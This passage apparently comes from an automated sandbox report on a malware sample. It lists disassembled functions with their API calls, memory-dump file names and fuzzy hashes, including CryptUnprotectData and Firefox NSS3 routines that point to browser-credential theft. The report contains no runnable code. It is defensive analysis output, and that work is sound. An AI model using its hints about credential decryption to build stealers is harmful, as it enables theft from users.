                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 00407294
                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004072C1
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407CD0,80000001,00415CA4), ref: 004072E4
                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 004072EE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                          • String ID:
                                                                                          • API String ID: 3657800372-0
                                                                                          • Opcode ID: 5915e9d016c50e8c8afbc1db5a49932ad24ad0ff49fd5d82b8f52955bd254427
                                                                                          • Instruction ID: 878b0d7115cd8d43870734417daae2c605d8a0a5a409213b4f7418bdd2279ebf
                                                                                          • Opcode Fuzzy Hash: 5915e9d016c50e8c8afbc1db5a49932ad24ad0ff49fd5d82b8f52955bd254427
                                                                                          • Instruction Fuzzy Hash: 31014071A40208BBDB10DF94CC46F9E7779BB44700F204055FB05BB2D0D6B0AA019BA9
                                                                                          Function 6CC5CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC5D086
                                                                                          • PR_Malloc.NSS3(00000001), ref: 6CC5D0B9
                                                                                          • PR_Free.NSS3(?), ref: 6CC5D138
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeMallocstrlen
                                                                                          • String ID: >
                                                                                          • API String ID: 1782319670-325317158
                                                                                          • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                          • Instruction ID: 1ed1765329f112027a302769bd1673fdc8363677da4f2fc55c200fd1dbbfe939
                                                                                          • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                          • Instruction Fuzzy Hash: 0FD17B22B417460BEB14487E8DA13EA77939786374FD80329D122DBBE5F65988B3C349
                                                                                          Function 6CBFAD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5637ad0faabb37b3b2802218ff7ccb2a91a7894b4c7e6e59776d8a77c8964b77
                                                                                          • Instruction ID: 512e7b1f51b7ed20404d60fdbf4769679219d93c459d53060a47bae0fd4432c5
                                                                                          • Opcode Fuzzy Hash: 5637ad0faabb37b3b2802218ff7ccb2a91a7894b4c7e6e59776d8a77c8964b77
                                                                                          • Instruction Fuzzy Hash: 3AF1BC71E012968FEB04CFA8D9443AD77B0FB8A308F15422DD915D7B54EB70999ACBC1
                                                                                          Function 00418940 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000), ref: 00418960
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: BinaryCryptString
                                                                                          • String ID:
                                                                                          • API String ID: 80407269-0
                                                                                          • Opcode ID: 3aec6097f2b6cc18e3a50b756b1644abdcd7f84ae5ce4698d77b00bdd9d6955c
                                                                                          • Instruction ID: 8551c2f8eff3d936ade43cc3e5b46360b1bd8edc09fa8c17659182bc6519fa86
                                                                                          • Opcode Fuzzy Hash: 3aec6097f2b6cc18e3a50b756b1644abdcd7f84ae5ce4698d77b00bdd9d6955c
                                                                                          • Instruction Fuzzy Hash: DF1118B5220209FFDB14CF54D884FBB37A9AF99314F109549F9098B250DB79EC82CB69
                                                                                          Function 00417420 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DD0,00000000,?), ref: 00417450
                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DD0,00000000,?), ref: 00417457
                                                                                          • GetLocalTime.KERNEL32(?,?,?,?,?,00420DD0,00000000,?), ref: 00417464
                                                                                          • wsprintfA.USER32 ref: 00417493
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                          • String ID:
                                                                                          • API String ID: 1243822799-0
                                                                                          • Opcode ID: 5f2f51bfbe90337ca5e895f9776451138895015e5f3a8196a904fc3d9a46e3df
                                                                                          • Instruction ID: 50de9df5f87ad77eb031dc94815d0013ed19ce73efbeceace7c97849f90fee7e
                                                                                          • Opcode Fuzzy Hash: 5f2f51bfbe90337ca5e895f9776451138895015e5f3a8196a904fc3d9a46e3df
                                                                                          • Instruction Fuzzy Hash: 82113CB2904518ABCB14DFC9DD45FBEB7B9FB4CB11F10411AF605A2290D3795941C7B4
                                                                                          Function 6CAD6F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
                                                                                          • API String ID: 0-3485574213
                                                                                          • Opcode ID: 0f6bb69753226b5d18e26b5955344ef68e19fc25970d1def322ea6ec31845f53
                                                                                          • Instruction ID: 79ca2076f153f6583eb0d5edacc9841b68d3d4e0c31dffc4700780aceb27c11d
                                                                                          • Opcode Fuzzy Hash: 0f6bb69753226b5d18e26b5955344ef68e19fc25970d1def322ea6ec31845f53
                                                                                          • Instruction Fuzzy Hash: 29716E32F001114BDB188A6DC8803AE73629F85314F2A4379DD55EBBD5D6716C8687D2
                                                                                          Function 6CA66CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InitializeConditionVariable.KERNEL32(?), ref: 6CA66D45
                                                                                          • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CA66E1E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2582767178.000000006CA21000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2582603888.000000006CA20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584183134.000000006CAAE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2584334856.000000006CAB2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6ca20000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConditionExclusiveInitializeLockReleaseVariable
                                                                                          • String ID:
                                                                                          • API String ID: 4169067295-0
                                                                                          • Opcode ID: 690c97c2046d4c7d230feb0fff775192952f6c8c353d92f6ea6d00036ba095da
                                                                                          • Instruction ID: d9586506296b490c395422cdc0590bb0855af8969f9e451c8233276e3083d15e
                                                                                          • Opcode Fuzzy Hash: 690c97c2046d4c7d230feb0fff775192952f6c8c353d92f6ea6d00036ba095da
                                                                                          • Instruction Fuzzy Hash: 43A170746183858FC715CF25C5907AEFBF1BF89308F45891DE48A87B51DB70A889CB92
                                                                                          Function 6CB6EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB6F019
                                                                                          • PK11_GenerateRandom.NSS3(?,00000000), ref: 6CB6F0F9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorGenerateK11_Random
                                                                                          • String ID:
                                                                                          • API String ID: 3009229198-0
                                                                                          • Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                          • Instruction ID: b7b9460020041934164cb78a9498ce1669ba732e2b02ead8e86e2e8741731a4b
                                                                                          • Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                          • Instruction Fuzzy Hash: 7491A075E0025A8BCB14CF69C8916AEB7F1FF85324F24472DD962A7BC0D730A905CB91
                                                                                          Function 6CB92F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6CBB7929), ref: 6CB92FAC
                                                                                          • PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6CBB7929), ref: 6CB92FE0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Error
                                                                                          • String ID:
                                                                                          • API String ID: 2619118453-0
                                                                                          • Opcode ID: 1bce029e37f1f96b6d87a8710ec6bd49eef07299e182d626c6739715b15df86d
                                                                                          • Instruction ID: 976c29df1474fd772549099e8d20abcc5b65fdc73fd13f2e964c7fa548270bb5
                                                                                          • Opcode Fuzzy Hash: 1bce029e37f1f96b6d87a8710ec6bd49eef07299e182d626c6739715b15df86d
                                                                                          • Instruction Fuzzy Hash: 70512571A049A18FDB10CE59C880B6E77B9FF47318F294139D90D9BB11D731E946CB82
                                                                                          Function 6CBB0E20 Relevance: 2.8, APIs: 2, Instructions: 279COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6CBB1052
                                                                                          • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6CBB1086
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpymemset
                                                                                          • String ID:
                                                                                          • API String ID: 1297977491-0
                                                                                          • Opcode ID: 3a3324bcb00e831d824bbf3601eecaf88620ed2a7952f4bc6a3f3cbef9fd7a1e
                                                                                          • Instruction ID: 4d169919356dac806af5b2e11a1f4cd97091cd3a1d0848eacdc7f1476a3dd4a7
                                                                                          • Opcode Fuzzy Hash: 3a3324bcb00e831d824bbf3601eecaf88620ed2a7952f4bc6a3f3cbef9fd7a1e
                                                                                          • Instruction Fuzzy Hash: 31A10971B0129A9BDF08CF99D990ABEB7B6FF88314B148129E915B7700DB35EC11CB91
                                                                                          Function 6CADAC60 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: winUnlock$winUnlockReadLock
                                                                                          • API String ID: 0-3432436631
                                                                                          • Opcode ID: 7830df4e8c7702bb6359c44a17ca7befcad6fd8ac1ae0599bc3a04507deef758
                                                                                          • Instruction ID: 54e58e919858175c361a94689f02556ed43e8c3b556a553b684c439bdad08b57
                                                                                          • Opcode Fuzzy Hash: 7830df4e8c7702bb6359c44a17ca7befcad6fd8ac1ae0599bc3a04507deef758
                                                                                          • Instruction Fuzzy Hash: 60717E71608245ABDB04CF29E884AAABBF5FF89314F15C61CF94997241DB30A986CBD1
                                                                                          Function 6CB9ED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6CB9EE3D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Alloc_ArenaUtil
                                                                                          • String ID:
                                                                                          • API String ID: 2062749931-0
                                                                                          • Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                          • Instruction ID: 475c0ea86bf362747e21c1fccbd7158628115b38788cca69c0167c375fd2aeb3
                                                                                          • Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                          • Instruction Fuzzy Hash: A971C372A01B818BEB18CF59C88076EBBF2FB99314F15463ED85697B91D730E900CB91
                                                                                          Function 6CAD4DB0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: winUnlockReadLock
                                                                                          • API String ID: 0-4244601998
                                                                                          • Opcode ID: 6c044e96aa2efeeb13b633cf6a9e8015fdeddc392513d0d93b15c545e58f7df9
                                                                                          • Instruction ID: efd195b87b07c918ca6e96953c1573f7d345e6352c491dcffb6b7e137cd20dda
                                                                                          • Opcode Fuzzy Hash: 6c044e96aa2efeeb13b633cf6a9e8015fdeddc392513d0d93b15c545e58f7df9
                                                                                          • Instruction Fuzzy Hash: 14E11BB0A083419FDB04DF29D48865ABBF0FF99314F55961DF88997251EB30E985CB82
                                                                                          Function 0041C8D9 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001C897), ref: 0041C8DE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: 92af57a2eb04ab3802c4d219b965fa46d3e89a576cd6fa8fbae2cab6dd9d340f
